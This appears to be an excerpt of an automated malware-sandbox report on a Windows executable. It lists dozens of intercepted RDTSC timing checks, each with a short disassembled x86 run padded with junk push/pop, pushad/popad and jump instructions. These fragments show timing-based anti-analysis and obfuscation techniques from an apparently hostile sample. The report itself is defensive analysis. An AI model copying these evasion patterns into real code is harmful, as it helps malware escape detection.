Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3FD82C second address: 3FD830 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3FD982 second address: 3FD988 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3FD988 second address: 3FD9AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F856102FBF0h 0x0000000d jmp 00007F856102FBEBh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3FDC14 second address: 3FDC18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3FDC18 second address: 3FDC33 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F856102FBECh 0x0000000c jc 00007F856102FBE6h 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pop edx 0x00000018 pushad 0x00000019 popad 0x0000001a pop eax 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3FDC33 second address: 3FDC39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3FDDA0 second address: 3FDDAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F856102FBE6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3FDDAF second address: 3FDDB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3FDDB3 second address: 3FDDB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3FDDB9 second address: 3FDDD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F856106A866h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3FE1E5 second address: 3FE1EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4055EE second address: 4055F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4055F4 second address: 405608 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F856102FBE6h 0x0000000a jmp 00007F856102FBEAh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 405608 second address: 40562B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F856106A861h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 push esi 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 40562B second address: 405646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007F856102FBE8h 0x0000000b jl 00007F856102FBF2h 0x00000011 jns 00007F856102FBE6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3734B7 second address: 3734BC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 404700 second address: 404704 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 404F2E second address: 404F55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F856106A868h 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F856106A856h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4050CD second address: 4050EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007F856102FBF7h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 409BE3 second address: 409C03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A866h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 409C03 second address: 409C0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 409C0F second address: 409C13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 408B3F second address: 408B45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C9263 second address: 3C9269 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C9269 second address: 3C9282 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F856102FBE8h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C933F second address: 3C9344 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C953E second address: 3C954C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C954C second address: 3C9562 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F856106A858h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jo 00007F856106A85Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C9562 second address: 3C956A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C956A second address: 3C956E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C956E second address: 3C9572 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C9572 second address: 20E9D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007F856106A858h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 movzx edi, cx 0x00000025 push dword ptr [ebp+122D0931h] 0x0000002b jmp 00007F856106A85Dh 0x00000030 call dword ptr [ebp+122D3547h] 0x00000036 pushad 0x00000037 jc 00007F856106A862h 0x0000003d jg 00007F856106A85Ch 0x00000043 xor eax, eax 0x00000045 jnp 00007F856106A857h 0x0000004b cld 0x0000004c mov edx, dword ptr [esp+28h] 0x00000050 clc 0x00000051 mov dword ptr [ebp+122D36F8h], eax 0x00000057 mov dword ptr [ebp+122D1D2Ah], eax 0x0000005d mov esi, 0000003Ch 0x00000062 ja 00007F856106A857h 0x00000068 clc 0x00000069 add esi, dword ptr [esp+24h] 0x0000006d xor dword ptr [ebp+122D1D6Eh], ecx 0x00000073 lodsw 0x00000075 jmp 00007F856106A867h 0x0000007a add eax, dword ptr [esp+24h] 0x0000007e jmp 00007F856106A85Ah 0x00000083 mov ebx, dword ptr [esp+24h] 0x00000087 add dword ptr [ebp+122D1D2Ah], ecx 0x0000008d cmc 0x0000008e push eax 0x0000008f pushad 0x00000090 jl 00007F856106A85Ch 0x00000096 push eax 0x00000097 push edx 0x00000098 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C9682 second address: 3C9686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C9686 second address: 20E9D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jno 00007F856106A856h 0x00000010 push edx 0x00000011 pop edx 0x00000012 popad 0x00000013 jmp 00007F856106A85Dh 0x00000018 popad 0x00000019 nop 0x0000001a add dword ptr [ebp+122D34E9h], edi 0x00000020 mov edx, dword ptr [ebp+122D3610h] 0x00000026 push dword ptr [ebp+122D0931h] 0x0000002c mov ecx, 634F4413h 0x00000031 call dword ptr [ebp+122D3547h] 0x00000037 pushad 0x00000038 jc 00007F856106A862h 0x0000003e jg 00007F856106A85Ch 0x00000044 xor eax, eax 0x00000046 jnp 00007F856106A857h 0x0000004c cld 0x0000004d mov edx, dword ptr [esp+28h] 0x00000051 clc 0x00000052 mov dword ptr [ebp+122D36F8h], eax 0x00000058 mov dword ptr [ebp+122D1D2Ah], eax 0x0000005e mov esi, 0000003Ch 0x00000063 ja 00007F856106A857h 0x00000069 clc 0x0000006a add esi, dword ptr [esp+24h] 0x0000006e xor dword ptr [ebp+122D1D6Eh], ecx 0x00000074 lodsw 0x00000076 jmp 00007F856106A867h 0x0000007b add eax, dword ptr [esp+24h] 0x0000007f jmp 00007F856106A85Ah 0x00000084 mov ebx, dword ptr [esp+24h] 0x00000088 add dword ptr [ebp+122D1D2Ah], ecx 0x0000008e cmc 0x0000008f push eax 0x00000090 pushad 0x00000091 jl 00007F856106A85Ch 0x00000097 push eax 0x00000098 push edx 0x00000099 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C9737 second address: 3C973B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C973B second address: 3C9767 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F856106A85Bh 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 push ebx 0x00000013 jmp 00007F856106A85Eh 0x00000018 pop ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C9767 second address: 3C976B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C976B second address: 3C9793 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F856106A856h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F856106A867h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C9793 second address: 3C97AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C97AF second address: 3C97B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C9881 second address: 3C9885 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C98E9 second address: 3C9929 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F856106A858h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d xchg eax, esi 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F856106A858h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 pushad 0x00000029 or dword ptr [ebp+1247DAB4h], esi 0x0000002f popad 0x00000030 nop 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C9929 second address: 3C992D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C992D second address: 3C9958 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F856106A856h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop edi 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F856106A869h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C9A6A second address: 3C9A93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007F856102FBF2h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 js 00007F856102FBF0h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b pop eax 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C9C46 second address: 3C9C55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F856106A85Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C9F81 second address: 3C9F97 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F856102FBE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C9F97 second address: 3C9FA1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F856106A85Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C9FA1 second address: 3C9FCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 or dword ptr [ebp+12473A9Bh], eax 0x0000000d push 0000001Eh 0x0000000f mov edi, dword ptr [ebp+122D3900h] 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jmp 00007F856102FBF1h 0x0000001e push esi 0x0000001f pop esi 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3CA2D0 second address: 3CA2D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3CA2D4 second address: 3CA2E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3CA2E0 second address: 3CA2E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3CA2E4 second address: 3CA2E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3CA2E8 second address: 3CA30C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push edi 0x0000000c push edi 0x0000000d jmp 00007F856106A85Dh 0x00000012 pop edi 0x00000013 pop edi 0x00000014 mov eax, dword ptr [eax] 0x00000016 push eax 0x00000017 push edx 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b pop edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 409636 second address: 409644 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 409644 second address: 409648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 409648 second address: 409664 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F856102FBE6h 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 409664 second address: 40966E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F856106A856h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 40966E second address: 409678 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 40F858 second address: 40F85C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 40F85C second address: 40F862 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 40F9EB second address: 40FA08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F856106A869h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 40FA08 second address: 40FA0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 40FB88 second address: 40FB8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 40FB8D second address: 40FB9E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F856102FBECh 0x00000008 ja 00007F856102FBE6h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 40FB9E second address: 40FBB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F856106A856h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 jnc 00007F856106A856h 0x00000016 pop ebx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 417E09 second address: 417E10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 417E10 second address: 417E1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 ja 00007F856106A856h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 418283 second address: 4182B6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F856102FBF9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F856102FBF4h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4182B6 second address: 4182D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F856106A868h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4182D4 second address: 4182DE instructions: 0x00000000 rdtsc 0x00000002 jno 00007F856102FBE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4182DE second address: 4182EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F856106A856h 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 41BA3B second address: 41BA4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jnl 00007F856102FBE6h 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 41BA4E second address: 41BA5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A85Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 421FF6 second address: 421FFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 420F16 second address: 420F23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jc 00007F856106A856h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C9E3A second address: 3C9EA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jng 00007F856102FBE6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007F856102FBE8h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b movzx ecx, si 0x0000002e push 00000004h 0x00000030 push 00000000h 0x00000032 push ecx 0x00000033 call 00007F856102FBE8h 0x00000038 pop ecx 0x00000039 mov dword ptr [esp+04h], ecx 0x0000003d add dword ptr [esp+04h], 0000001Bh 0x00000045 inc ecx 0x00000046 push ecx 0x00000047 ret 0x00000048 pop ecx 0x00000049 ret 0x0000004a adc di, 0F2Eh 0x0000004f nop 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 pushad 0x00000054 popad 0x00000055 pushad 0x00000056 popad 0x00000057 popad 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3C9EA3 second address: 3C9EC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A85Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F856106A860h 0x00000012 jmp 00007F856106A85Ah 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4210A5 second address: 4210A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4210A9 second address: 4210AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4210AF second address: 4210C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F856102FBEAh 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 42A179 second address: 42A181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 428116 second address: 428132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F856102FBF3h 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 428132 second address: 428137 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 428137 second address: 42813D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4282BD second address: 4282DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A866h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
